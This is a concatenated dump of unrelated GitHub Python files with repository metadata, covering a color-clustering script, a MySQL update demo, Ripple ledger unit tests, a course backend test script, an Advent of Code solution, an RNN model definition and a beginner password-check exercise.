"product": "Clarks Desert Boot",
"color": "Chocolate",
"size": "12",
"category": "mens-footwear",
"firstName": "John",
"lastName": "Smith",
"nameField": "John Smith",
"emailfield": "example@example.com",
"phonefield": "6780870522",
"addressfield": "example road",
"city": "example",
"zip": "30106",
"country": "GB",
"card": "visa",
"number": "1234123412341234",
"month": "09",
"year": "2020",
"expiry": "0920",
"ccv": "123"
}
bot = KithBot(**INFO)
bot.main()
| [
"desmon.stanford@keysight.com"
] | desmon.stanford@keysight.com |
4e48c33398ffe0b53232e3744f4314679faeb2f9 | f8330920cf0136849f850810511860e01de348b2 | /main.py | 7d427691a5dc67938fecd7b5f42504bb8b2b8763 | [] | no_license | trjoma/Determination-of-dominant-colors | bc4356fa27e036b3934b7ab85cc1f5f33bb03748 | f41b2c1586ad39458de6939bf797ca15f9c3db6d | refs/heads/main | 2023-01-06T01:19:04.615405 | 2020-10-27T07:22:57 | 2020-10-27T07:22:57 | 307,617,111 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,348 | py | import numpy as np
import cv2
from matplotlib import pyplot as plt
K = 5 #number of colors
img = cv2.imread('b2.jpg')
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
Z = img.reshape((-1, 3))
# convert to np.float32
Z = np.float32(Z)
# define criteria and apply kmeans()
criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 10, 1.0)
ret, label, center = cv2.kmeans(Z, K, None, criteria, 10,
cv2.KMEANS_RANDOM_CENTERS)
# Now separate the data, Note the flatten()
center = np.uint8(center)
res = center[label.flatten()]
res2 = res.reshape((img.shape))
clr = []
for k in range(len(center)):
clr.append("#{:02x}{:02x}{:02x}".format(center[k][0], center[k][1],
center[k][2]))
print('Used colors:')
for c in range(len(clr)):
print(f' {clr[c]}')
inp = list(np.unique(list(label), return_counts=True))
outp = []
bars = []
height = []
for i in range(K):
bars.append(inp[0][i])
height.append(inp[1][i])
y_pos = np.arange(len(bars))
plt.subplot(121), plt.imshow(res2) # 'img' or 'res2'
plt.title('Image'), plt.xticks([]), plt.yticks([])
plt.subplot(122), plt.pie(
height, labels=clr, colors=clr, autopct='%.1f%%', startangle=90)
plt.title('Dominant colors'), plt.xticks([]), plt.yticks([])
plt.show()
cv2.waitKey(0)
#cv2.destroyAllWindows()
| [
"noreply@github.com"
] | trjoma.noreply@github.com |
cd719227705450db0c8e01e80f0fa6aff6cc3063 | 42de721fb3eebdb0260edf24fe0c20db6169b2f2 | /connetdb/dome4.py | 8c46fd9f866e92a92f85f7dfec53e98907858736 | [] | no_license | devile-xiang/-_python_spider | 56f3a4cff2fb69493c9887b0c62434a6989052f5 | b45d470ec54b79bc91e2ecfcc852c7c23f52848d | refs/heads/master | 2020-07-29T20:39:45.835950 | 2019-09-21T09:18:38 | 2019-09-21T09:18:38 | 209,951,884 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 435 | py | #encoding:utf-8
import pymysql
#写法要规范
conn=pymysql.connect(host='localhost',user='root',password='root',
database='pymysql_dome',port=3306)
cursor=conn.cursor()
#删除数据
# sql="""delete from user where id=%s """
#修改数据
sql="""update user set username=%s where id=%s """
username='新名字'
id=2
cursor.execute(sql,(username,id))
#提交到数据库执行
conn.commit()
conn.close() | [
"2904633401@.qq.com"
] | 2904633401@.qq.com |
e3e6513bd3ab0b4f93eae2ab6535cf0e3c2bf8ca | c4c484c3cf9b005433fa4ddbb08820b7177a005e | /test/test_grapple.py | acbc1f337f5698e09af2d4ca539316e16a5efbd4 | [
"MIT"
] | permissive | kai2008/grapple | ea1a8e20df2d485feb515b3dc5ff74434e646beb | 61e06ce27902e7285c9707947f8efe167fa4e6e9 | refs/heads/master | 2021-05-28T12:26:46.876954 | 2015-01-23T13:19:17 | 2015-01-23T13:19:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,982 | py | #!/usr/bin/env python
"""Grapple unit tests.
Remove the leading underscore from _test_init_fullrun and _test_init_smallrun
to do download tests, if your machine has a working rippled and Postgres
installation.
The other tests are run by connecting to Ripple Labs' public websocket.
At the moment, there are no tests for the methods that require a
database connection.
"""
from __future__ import division, print_function, unicode_literals, absolute_import
try:
import sys
import cdecimal
sys.modules["decimal"] = cdecimal
except:
pass
import os
import platform
from decimal import Decimal, getcontext, ROUND_HALF_EVEN
import psycopg2 as db
import psycopg2.extensions as ext
if platform.python_version() < "2.7":
unittest = __import__("unittest2")
else:
import unittest
HERE = os.path.dirname(os.path.realpath(__file__))
sys.path.insert(0, os.path.join(HERE, os.pardir, "grapple"))
from grapple import Grapple
class TestGrapple(unittest.TestCase):
def setUp(self):
self.txhash = "BC02D079CB7B2087C70F857E6EDAFD72229887B9313C776890FB92D59CF3DD54"
self.grapple = Grapple(socket_url="wss://s1.ripple.com:51233/")
self.assertIsNone(self.grapple.socket)
def _test_init_fullrun(self):
self.grapple = Grapple(full=True)
self.assertTrue(self.grapple.full)
self.grapple.download()
def _test_init_smallrun(self):
self.grapple = Grapple(genesis=8642812)
self.assertEqual(self.grapple.halt, 8642812)
self.grapple.download()
def test_init_resampling_frequencies(self):
self.grapple = Grapple(resampling_frequencies=('8T', '12T'))
self.assertEqual(self.grapple.resampling_frequencies, ('8T', '12T'))
def test_rippled_connect(self):
self.assertIsNone(self.grapple.socket)
self.grapple.rippled_connect()
self.assertIsNotNone(self.grapple.socket)
self.assertTrue(self.grapple.socket.connected)
def test_get_current_index(self):
self.grapple.rippled_connect()
self.grapple.get_current_index()
self.assertIsNotNone(self.grapple.ledger_current_index)
self.assertEqual(type(self.grapple.ledger_current_index), int)
self.assertGreater(self.grapple.ledger_current_index, 8642812)
def test_read_next_ledger(self):
self.grapple.rippled_connect()
self.grapple.get_current_index()
self.grapple.ledgers_to_read = self.grapple.ledger_current_index - self.grapple.halt
self.grapple.ledger_index = self.grapple.ledger_current_index - 1
self.grapple.stored_tx = 0
ledger = self.grapple.read_next_ledger()
self.assertIsNotNone(ledger)
def test_parse_ledger(self):
self.grapple.rippled_connect()
self.grapple.get_current_index()
self.grapple.ledgers_to_read = self.grapple.ledger_current_index - self.grapple.halt
self.grapple.ledger_index = self.grapple.ledger_current_index - 1
self.grapple.stored_tx = 0
ledger = self.grapple.read_next_ledger()
tx_hash_list, accepted = self.grapple.parse_ledger(ledger)
def test_get_tx(self):
self.grapple.rippled_connect()
self.grapple.get_current_index()
self.grapple.ledgers_to_read = self.grapple.ledger_current_index - self.grapple.halt
self.grapple.ledger_index = self.grapple.ledger_current_index - 1
self.grapple.stored_tx = 0
ledger = self.grapple.read_next_ledger()
tx_hash_list, accepted = self.grapple.parse_ledger(ledger)
tx_data_result, options = self.grapple.get_tx(self.txhash, ledger)
self.assertIsNotNone(tx_data_result)
def tearDown(self):
if self.grapple.socket and self.grapple.socket.connected:
self.grapple.socket.close()
del self.grapple
if __name__ == "__main__":
suite = unittest.TestLoader().loadTestsFromTestCase(TestGrapple)
unittest.TextTestRunner(verbosity=2).run(suite)
| [
"jack@tinybike.net"
] | jack@tinybike.net |
40ece971b33aaf536d5416eb3640969263889d8d | e25dd4bb657dd96b5a7c462651737b4a44ed9c81 | /hw8/test-backend.py | 88ca1c44ffda56bbad6adc69e450463f7d26125f | [] | no_license | Elina-L/comp431 | 99452326d59636b7e054f949bca23f0a5011cb75 | 9b46ad8d058864f267f5f2df16f1fec71a56f4bf | refs/heads/master | 2020-12-25T15:17:17.505374 | 2016-12-15T00:51:26 | 2016-12-15T00:51:26 | 66,399,561 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,856 | py | #!/usr/bin/env python
import requests, json, sys, pprint
pp = pprint.PrettyPrinter(indent=4)
class cc:
HEADER = '\033[95m'
BLUE = '\033[94m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
def get(endpoint):
url = config["backend"] + endpoint
r = requests.get(url)
if r.status_code != 200:
print(cc.FAIL + ("ERROR: For GET %s received %d response code " % (endpoint, r.status_code)) + str(r.text) + cc.ENDC)
sys.exit(1)
return json.loads(r.text)
def put(endpoint):
url = config["backend"] + endpoint
r = requests.put(url)
if r.status_code != 200:
print(cc.FAIL + ("ERROR: For PUT %s received %d response code " % (endpoint, r.status_code)) + str(r.text) + cc.ENDC)
sys.exit(1)
return json.loads(r.text)
def getArticles(articleId=None):
endpoint = '/articles'
if articleId is not None:
endpoint = (endpoint + "/%d") % articleId
return checkArticles(get(endpoint))
def checkArticles(result):
if "articles" not in result:
print(cc.FAIL + "ERROR: GET /articles did not have \"articles\" entry" + cc.ENDC)
print(result)
return []
else:
return result["articles"]
def addArticle(body):
r = requests.post(config["backend"] + "/article", json={'text':body})
return checkArticles( json.loads(r.text) )
def msg(message):
print(cc.BLUE + message + cc.ENDC)
################################################
if len(sys.argv) < 2:
print("usage: %s README.json" % sys.argv[0])
sys.exit(1)
with open(sys.argv[1], 'r') as f:
config = json.loads(f.read())
for key in config.keys():
if config[key].endswith('/'):
config[key] = (config[key])[:-1]
print(cc.YELLOW + ("Checking for %s site %s" % (config['netid'], config['backend'])) + cc.ENDC)
######################################
# inital GET
r = get("/")
msg("GET /")
pp.pprint(r)
# GET /articles
articles = getArticles()
msg("GET /articles")
pp.pprint(articles)
if len(articles) < 3:
print(cc.FAIL + ("FAIL: Expected at least 3 articles from GET /articles but found %d " % len(articles)) + cc.ENDC)
else:
print(cc.GREEN + ("OK: GET /articles returned %d articles, expecting at least 3" % len(articles)) + cc.ENDC)
######################################
# add a new article
body = "Hello World!"
newArticles = addArticle(body)
msg("POST /article -d " + body)
pp.pprint(newArticles)
if len(newArticles) is not 1:
print(cc.FAIL + ("FAIL: Expected 1 new article added but found %d articles" % len(newArticles)) + cc.ENDC)
else:
newArticleId = newArticles[0]['id']
print(cc.GREEN + ("OK: POST /article returned one new article with id=%d" % newArticleId) + cc.ENDC)
if newArticles[0]['text'] != body:
print(cc.FAIL + ("FAIL: Article did not have the correct body message: %s vs %s" % (newArticles[0]['text'], body)) + cc.ENDC)
else:
print(cc.GREEN + ("OK: article body was correct") + cc.ENDC)
######################################
# get that new article by itself
getNewArticle = getArticles(newArticleId)
msg("GET /articles/%d" % newArticleId)
pp.pprint(getNewArticle)
if len(getNewArticle) is not 1:
print(cc.FAIL + ("FAIL: Expected to get the one article that was added but found %d articles" % len(getNewArticle)) + cc.ENDC)
else:
print(cc.GREEN + ("OK: GET /articles/%d got the new article" % newArticleId) + cc.ENDC)
if getNewArticle[0]['text'] != newArticles[0]['text'] or newArticles[0]['text'] != body:
print(cc.FAIL + ("FAIL: Article did not have the correct text message: %s" % getNewArticle[0]['text']) + cc.ENDC)
else:
print(cc.GREEN + ("OK: article text was correct") + cc.ENDC)
######################################
# confirm that we only added one article
articles2 = getArticles()
msg("GET /articles")
pp.pprint(articles2)
if len(articles2) is not len(articles) + 1:
print(cc.FAIL + ("FAIL: Expected one new article added but found %d + 1 = %d" % (len(articles), len(articles2))) + cc.ENDC)
else:
print(cc.GREEN + ("OK: GET /articles returned one additional article") + cc.ENDC)
######################################
print(cc.YELLOW + ('Testing stubs...') + cc.ENDC)
# Stubs
for e in [ "/headlines", "/headlines/"+config['netid'], "/email", "/email/"+config['netid'], "/zipcode", "/zipcode/"+config['netid'], "/avatars", "/avatars/" + config['netid'] ]:
msg("GET " + e)
pp.pprint(get(e))
for e in [ "/headline", "/email", "/zipcode", "/avatar" ]:
msg("PUT " + e)
pp.pprint(put(e))
## done
print(cc.YELLOW + ('COMPLETE!') + cc.ENDC)
| [
"noreply@github.com"
] | Elina-L.noreply@github.com |
547fa00ac73e716c3d016cbe991ff8100413263c | c26ba5147d5104096157daf7e92f29038dc96826 | /Script Files/PostProcessing/getArtistNames.py | 66463fc8fabd971de89ca41dd0858c947748bc3b | [] | no_license | xiazhuol/BookReco | 58e72ee0e4c99857f7e241b845693ecb1ea95245 | 095bb59cdf18e98f904d0ef8585334b656ef8bfc | refs/heads/master | 2021-03-17T18:36:54.086153 | 2020-03-13T09:34:43 | 2020-03-13T09:34:43 | 247,009,474 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 800 | py | real_artist_names = {}
artist_conversions = {}
with open('artist_names_metadata.txt', 'r') as f:
for line in f:
artist_id = line[0:7]
artist_name = line[8:]
artist_name = artist_name.replace(' ', '-')
artist_name=artist_name.strip()
real_artist_names[artist_id] = artist_name
with open('our_artists.txt', 'r') as f:
for line in f:
l = line.split()
big_id = l[0]
small_id=l[1]
artist_conversions[small_id] = big_id
with open('artist_conversions.csv', 'w') as w:
with open('finalUserData.csv') as f:
for line in f:
l = line.split(',')
u_id = l[0]
og_a_id = l[1]
rating = l[2]
rating = rating.strip()
a_id = artist_conversions[og_a_id]
artistName = real_artist_names[a_id]
toWrite = str(og_a_id)+","+str(artistName) + "\n"
w.write(toWrite)
| [
"xiazhuol@msu.edu"
] | xiazhuol@msu.edu |
f3764a8fc8b68e1515a012ad6d298ad0dfffbce8 | 7e16c7a48da4b10a860d1f159859fd6efd543a60 | /RNN_1C.py | 0de369ca841490f2b29d5fddd4c8c50a8c20ec82 | [] | no_license | OrestisAlpos/WebTrafficClassifier | e6c26b5988d88deba5e359759fabf8031515eb0d | bf1a4e65e295389cbd535e53c8a6db50b4ca85d5 | refs/heads/master | 2021-01-19T14:53:30.392890 | 2017-06-07T19:10:08 | 2017-06-07T19:10:08 | 88,193,170 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 892 | py |
from keras.models import Sequential
from keras.layers import Dense, Activation, SimpleRNN
from keras.utils.vis_utils import plot_model
import os
import numpy as np
from reader import Reader
length = Reader.getInputShape()
model = Sequential()
#EXPECTS INPUT AS (nb_sample, timesteps, nb_features), where nb_sample=1 (batch_size = 1), timesteps = 1 and nb_features = length
#model.add(Dense(40, input_dim = 12, init='uniform', activation='relu'))
model.add(SimpleRNN(units=50, input_shape=(1,length), batch_input_shape=(1,1,length), kernel_initializer='random_uniform', recurrent_initializer='random_uniform', activation='relu', stateful=True))
model.add(Dense(5, kernel_initializer='uniform', activation = 'softmax'))
model.summary()
plot_model(model, to_file='./RNNmodels/RNN_1C.png', show_shapes=True)
fp = open('./RNNmodels/RNN_1C.json', 'w')
fp.write(model.to_json())
fp.close()
| [
"or.al@hotmail.com"
] | or.al@hotmail.com |
1a7bacfc9808852cf7b990a159af019328d3deb0 | 9c0f691393abbeb5754e1624e0c48dfcdf857352 | /2017/Helpers/day_06.py | b8fc0de773effcccfda5ee364b548908e7b0101b | [] | no_license | seligman/aoc | d0aac62eda3e6adc3c96229ca859bd2274398187 | 9de27ff2e13100770a3afa4595b15565d45bb6bc | refs/heads/master | 2023-04-02T16:45:19.032567 | 2023-03-22T15:05:33 | 2023-03-22T15:05:33 | 230,493,583 | 17 | 10 | null | null | null | null | UTF-8 | Python | false | false | 1,540 | py | #!/usr/bin/env python3
DAY_NUM = 6
DAY_DESC = 'Day 6: Memory Reallocation'
def calc(log, values, redo):
banks = [int(x) for x in values[0].replace("\t", " ").split(" ")]
seen = set()
while True:
key = tuple(banks)
if key in seen:
if redo == 0:
break
else:
seen = set()
redo -= 1
seen.add(key)
i = banks.index(max(banks))
val = banks[i]
banks[i] = 0
for x in range(val):
banks[(i + 1 + x) % len(banks)] += 1
return len(seen)
def test(log):
values = [
"0 2 7 0",
]
if calc(log, values, 0) == 5:
if calc(log, values, 1) == 4:
return True
else:
return False
else:
return False
def run(log, values):
log(calc(log, values, 0))
log(calc(log, values, 1))
if __name__ == "__main__":
import sys, os
def find_input_file():
for fn in sys.argv[1:] + ["input.txt", f"day_{DAY_NUM:0d}_input.txt", f"day_{DAY_NUM:02d}_input.txt"]:
for dn in [[], ["Puzzles"], ["..", "Puzzles"]]:
cur = os.path.join(*(dn + [fn]))
if os.path.isfile(cur): return cur
fn = find_input_file()
if fn is None: print("Unable to find input file!\nSpecify filename on command line"); exit(1)
print(f"Using '{fn}' as input file:")
with open(fn) as f: values = [x.strip("\r\n") for x in f.readlines()]
print(f"Running day {DAY_DESC}:")
run(print, values)
| [
"scott.seligman@gmail.com"
] | scott.seligman@gmail.com |
b26893e0db5a57db2eed7de038eedc67337aecbf | b6f583d181011005a387b100931eaad8d0a00964 | /even odd sum of 3 digit num.py | 316bef4025a1fcf5c1d90a98daf2310a56023af3 | [] | no_license | abhaysingh00/PYTHON | fe6fa42c7057231bdba258d49846cca51ff2a350 | 2ef662b66641121ba3b8187d571a90e964e2ec77 | refs/heads/main | 2023-08-15T13:19:52.685749 | 2021-09-10T18:29:08 | 2021-09-10T18:29:08 | 404,481,174 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 307 | py | n= int(input("enter a three digit number: "))
i=n
sm=0
count=0
while(i>0):
count=count+1
sm=i%10+sm
i=i//10
if(count==3):
print(sm)
if(sm%2==0):
print("the sum is even")
else:
print("the sum is odd")
else:
print("the number entered is not of 3 digits")
| [
"abhay.2024cse1147@kiet.edu"
] | abhay.2024cse1147@kiet.edu |
a8a9884b2c45f1d68f56cbb5f3372047f190ed2e | a4c5540f4ff38d5445ab20ed80a57e224d12518f | /homeWork/password.py | dae1ac2526cd5b8cc3788caaa0624d929ec87644 | [] | no_license | qikai521/PyStu | b8f12457c10008825b82e921ebb307d1ef032f9d | 527983744bdb8da634ef3dc9e67012273cb1514e | refs/heads/master | 2021-01-25T09:31:58.542923 | 2017-06-21T10:26:04 | 2017-06-21T10:26:18 | 93,846,416 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 951 | py | length = 0;
while True:
if (length%2 == 1 and length %3 == 2 and length%5 == 4 and length%6 ==5 and length%7 == 0):
print("length == ",length)
break;
else:
print("other")
length += 1
#password :
nums = '1234567890'
chars = 'qwertyuiopasdfghjklzxcvbnm'
#低级密码要求:
# 1. 密码由单纯的数字或字母组成
# 2. 密码长度小于等于8位
password = input("请输入您要验证的密码:")
while (len(password) == 0 or password.isspace()):
password = input("请重新输入");
if len(password > 0):
break;
if len(password) >= 8 :
print("密码过长")
else:
checkCount = 0;
for word in password:
checkCount += 1
if (word in nums) or (word in chars):
if checkCount == len(password) :
print("密码格式正确")
continue;
else:
print("密码输入格式错误")
break;
| [
"664642260@qq.com"
] | 664642260@qq.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.